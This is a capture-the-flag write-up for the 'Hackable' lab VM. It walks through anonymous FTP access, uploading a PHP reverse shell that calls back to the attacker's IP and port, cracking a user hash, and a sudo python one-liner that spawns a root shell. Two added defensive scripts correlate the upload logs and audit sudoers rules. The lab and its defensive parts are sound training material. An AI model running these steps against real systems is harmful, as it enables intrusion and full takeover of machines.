🚩🚨Hackable || Write UP🚨

Furkan Sayyed

Description

difficulty: easy

Phase 1: Reconnaissance

To get the target machine's IP address, I am using arp-scan to scan my local network; in my case it's a VirtualBox NAT network, as both machines are on the same NAT.

The target IP is 192.168.100.6, as the other IPs are used by VirtualBox for DHCP services and the gateway.

Phase 2: Scanning the Target Machine

I will be using nmap for scanning the target machine

nmap -sV 192.168.100.6

I found ports 21, 22 and 80 open on the target machine. I will begin with HTTP on port 80 by opening the target IP in the browser.

I will be using Gobuster to find hidden directories / endpoints.

It seems there is only one endpoint, /files/, but it does not have anything interesting, just a plain HTML file.

Let's scan the target machine with an nmap script scan, since the FTP and SSH ports are open; let's see whether we find any vulnerability in those:

Here we go: we got an FTP configuration vulnerability, anonymous login is allowed. Let's exploit it.

Phase 3: Exploitation

Log in to FTP using anonymous as both the user and the password.

Now we have an FTP session. Next I will try to get a reverse shell connection using a PHP shell script. I am using the webshell script available in Kali at /usr/share/webshells/php.

Now I will upload it to the server over the FTP connection, with the following values set in the script:
$ip = '192.168.100.5';
$port = 1234;

$ip → IP address of my attacking machine
$port → Port number on my attacking machine that will be used to listen for the connection

The reverse shell file is uploaded successfully; we can execute it by opening 192.168.100.6/files/rev.php in the browser.

Here I got the reverse shell, and I am the user www-data.
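The chain in this phase (anonymous FTP login, upload of a PHP file into a directory the web server also serves, then a browser request that executes it) leaves a clear trail on the server side. The following Python script is an added example, not part of the original write-up; it correlates constructed vsftpd-style transfer log lines with constructed Apache combined-format access log lines, and assumes the anonymous FTP root is served at the /files/ URL prefix, as the write-up's upload path suggests.

```python
import posixpath
import re

# Assumption: the anonymous FTP root is the directory the web server serves at this URL prefix.
FTP_WEB_PREFIX = "/files"
# vsftpd logs anonymous sessions under its guest account ("ftp"); "anonymous" covers other servers.
ANON_USERS = {"ftp", "anonymous"}
# Extensions the web server would execute rather than serve as static content.
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# vsftpd-style transfer line:  ... [ftp] OK UPLOAD: Client "1.2.3.4", "/rev.php", 5493 bytes, ...
FTP_UPLOAD_RE = re.compile(
    r'\[(?P<user>[^\]]+)\] OK UPLOAD: Client "(?P<client>[^"]+)", "(?P<path>[^"]+)"'
)
# Combined access log line:  1.2.3.4 - - [date] "GET /files/rev.php HTTP/1.1" 200 ...
HTTP_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample FTP log (not from the write-up), in vsftpd's own log format.
FTP_LOG = """\
Sun Mar  3 10:12:01 2024 [pid 2101] CONNECT: Client "192.168.100.5"
Sun Mar  3 10:12:02 2024 [pid 2100] [ftp] OK LOGIN: Client "192.168.100.5", anon password "?"
Sun Mar  3 10:12:40 2024 [pid 2102] [ftp] OK UPLOAD: Client "192.168.100.5", "/rev.php", 5493 bytes, 212.07Kbyte/sec
Sun Mar  3 10:12:55 2024 [pid 2102] [ftp] OK UPLOAD: Client "192.168.100.5", "/notes.txt", 120 bytes, 11.00Kbyte/sec
Sun Mar  3 10:13:05 2024 [pid 2103] [ftp] OK DOWNLOAD: Client "192.168.100.5", "/index.html", 24 bytes, 1.00Kbyte/sec
"""

# Constructed sample web server access log in combined format.
HTTP_LOG = """\
192.168.100.5 - - [03/Mar/2024:10:11:30 +0000] "GET /files/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.100.5 - - [03/Mar/2024:10:14:10 +0000] "GET /files/rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.100.5 - - [03/Mar/2024:10:14:12 +0000] "GET /files/notes.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""


def anonymous_uploads(ftp_log):
    """Return (client, ftp_path) for every file stored over an anonymous session."""
    uploads = []
    for line in ftp_log.splitlines():
        m = FTP_UPLOAD_RE.search(line)
        if m and m.group("user") in ANON_USERS:
            uploads.append((m.group("client"), m.group("path")))
    return uploads


def script_uploads(uploads):
    """Keep only uploads whose extension the web server would execute."""
    return [(c, p) for c, p in uploads if posixpath.splitext(p)[1].lower() in SCRIPT_EXTS]


def correlate(ftp_log, http_log):
    """Flag anonymously uploaded scripts that were later requested over HTTP.

    Each finding records the FTP path, the URL it was reached at, the uploading
    and requesting clients and the HTTP status, so an analyst can confirm execution.
    """
    uploaded = script_uploads(anonymous_uploads(ftp_log))
    # Map the URL each upload would be served at back to its upload record.
    by_url = {
        posixpath.join(FTP_WEB_PREFIX, ftp_path.lstrip("/")): (client, ftp_path)
        for client, ftp_path in uploaded
    }
    findings = []
    for line in http_log.splitlines():
        m = HTTP_RE.match(line)
        if not m:
            continue
        url_path = m.group("path").split("?", 1)[0]   # ignore any query string
        if url_path in by_url:
            uploader, ftp_path = by_url[url_path]
            findings.append({
                "ftp_path": ftp_path,
                "url": url_path,
                "uploader": uploader,
                "requester": m.group("client"),
                "status": m.group("status"),
            })
    return findings


if __name__ == "__main__":
    for f in correlate(FTP_LOG, HTTP_LOG):
        print(f"ALERT: {f['uploader']} uploaded {f['ftp_path']} anonymously; "
              f"{f['requester']} then requested {f['url']} (HTTP {f['status']})")
```

On the sample data only rev.php is flagged: notes.txt is uploaded and fetched too, but a .txt file is served, not executed. The upload alone is already worth an alert; the HTTP hit is what confirms the box was compromised. The underlying fix is to keep the anonymous FTP root out of the web root, or to disable anonymous uploads altogether (anon_upload_enable=NO and write_enable=NO in vsftpd.conf).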

Phase 4: Privilege Escalation

Now let's see what users are available on the system.

So we have only one user, shrek, and a file in /home. Let's try to open the important.txt file.

The file important.txt says to run a script, which gives the hashed password for the shrek user.

Now let's identify the hash type and try to crack it.

So the hash algorithm can be any of these; let's try CrackStation to get the plaintext value.

Here we got the password for the shrek user; let's use SSH to log in as shrek.

SSH session started. Now we have to get root privileges to get the flag, which is in /root.

To see which programs the current user can run with sudo, I use the sudo -l command.

Here I will be using GTFOBins to look up exploitable binaries on Linux systems.

Now I will copy the given command, paste it on the target machine, and see whether it works.

I modified the command a little and got the root shell:

# command

sudo python3.5 -c 'import os; os.system("/bin/sh")'
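The root shell above works because sudo lets shrek run an interpreter as root, and any interpreter, editor or pager that can spawn a child process hands over a root shell the same way (that is the class of binaries GTFOBins catalogues). The defender's counterpart is to audit sudoers for such rules. The script below is an added example, not from the write-up: it parses a constructed sudoers snippet (the shrek rule and its NOPASSWD tag are assumptions, since the write-up only shows the resulting command) and flags rules that grant ALL or a shell-capable binary. The shortlist of binaries is constructed for illustration and is not the GTFOBins list.

```python
import posixpath
import re

# Constructed shortlist of binaries that can spawn a shell or write arbitrary files when run
# as root; illustrative only, not the GTFOBins catalogue. Version suffixes such as the "3.5"
# in python3.5 are stripped before matching.
SHELL_CAPABLE = {
    "sh", "bash", "dash", "zsh", "env",
    "python", "perl", "ruby", "php", "node",
    "vi", "vim", "nano", "less", "more", "find", "awk",
}

# One sudoers user specification:  who  host=(runas) [TAG:] cmd1, cmd2
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sudoers snippet (not from the write-up). The shrek rule is an assumption about
# what produced the write-up's "sudo python3.5" root shell; the backup rule shows the
# tightly scoped alternative (one specific script, no interpreter).
SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
shrek   ALL=(root) NOPASSWD: /usr/bin/python3.5
backup  ALL=(root) NOPASSWD: /usr/local/bin/rotate-logs.sh
deploy  ALL=(ALL) /usr/bin/systemctl restart nginx, /usr/bin/vim
"""


def normalise(command):
    """Return the bare program name: '/usr/bin/python3.5 -c x' -> 'python'."""
    exe = command.split()[0]
    return re.sub(r"[\d.]+$", "", posixpath.basename(exe))


def audit_sudoers(text):
    """Return one finding per sudo rule that gives a non-root principal a root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        who = m.group("who")
        if who == "root":
            continue                               # root's own rule is expected
        passwd = "without a password" if "NOPASSWD" in m.group("tags") else "with a password"
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd or cmd.startswith("!"):
                continue                           # negated entries only remove permissions
            if cmd == "ALL":
                findings.append({"user": who, "command": cmd,
                                 "reason": f"any command as root {passwd}"})
                continue
            base = normalise(cmd)
            if base in SHELL_CAPABLE:
                findings.append({"user": who, "command": cmd,
                                 "reason": f"{base} can spawn a root shell {passwd}"})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS):
        print(f"{f['user']}: {f['command']} -> {f['reason']}")
```

On the sample the script reports the %sudo group (expected, but its membership should be reviewed), shrek's python3.5 rule and deploy's vim entry; the backup rule passes because it names one script rather than an interpreter. Replacing the shrek rule with a rule for a specific wrapper script, as the backup rule does, removes the escalation path without taking away the task it was meant to allow.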

Here we got our flag, which is just ASCII art…

I hope you found it interesting; although it is very easy, it was quite fun to solve…
